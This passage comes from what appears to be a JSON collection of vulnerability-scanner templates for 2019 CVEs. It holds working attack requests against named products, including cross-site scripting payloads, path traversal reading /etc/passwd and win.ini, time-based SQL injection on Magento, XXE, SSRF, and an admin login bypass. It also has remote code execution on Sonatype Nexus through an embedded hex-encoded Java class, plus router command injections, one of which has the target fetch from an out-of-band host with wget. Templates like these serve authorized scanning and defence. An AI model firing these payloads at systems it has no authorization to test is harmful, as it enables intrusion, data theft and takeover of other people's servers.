Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Proxy Error"]},{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-6793","info":{"name":"GitLab Enterprise Edition - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /-/jira/login/oauth/access_token HTTP/1.1\nHost: {{interactsh-url}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["access_token="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Visualizer","Tested up to:"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7139","info":{"name":"Magento - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"text/x-magento-init\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"stop-at-first-match":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=6","contains(content_type_1, \"application/json\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["contains(content_type_2, \"application/json\") && contains(content_type_3, \"application/json\")","status_code_2 == 200 && status_code_3 == 400","len(body_2) == 2 && len(body_3) == 2"],"condition":"and"}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Social Warfare"]}]},{"raw":["GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Manager","License:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET 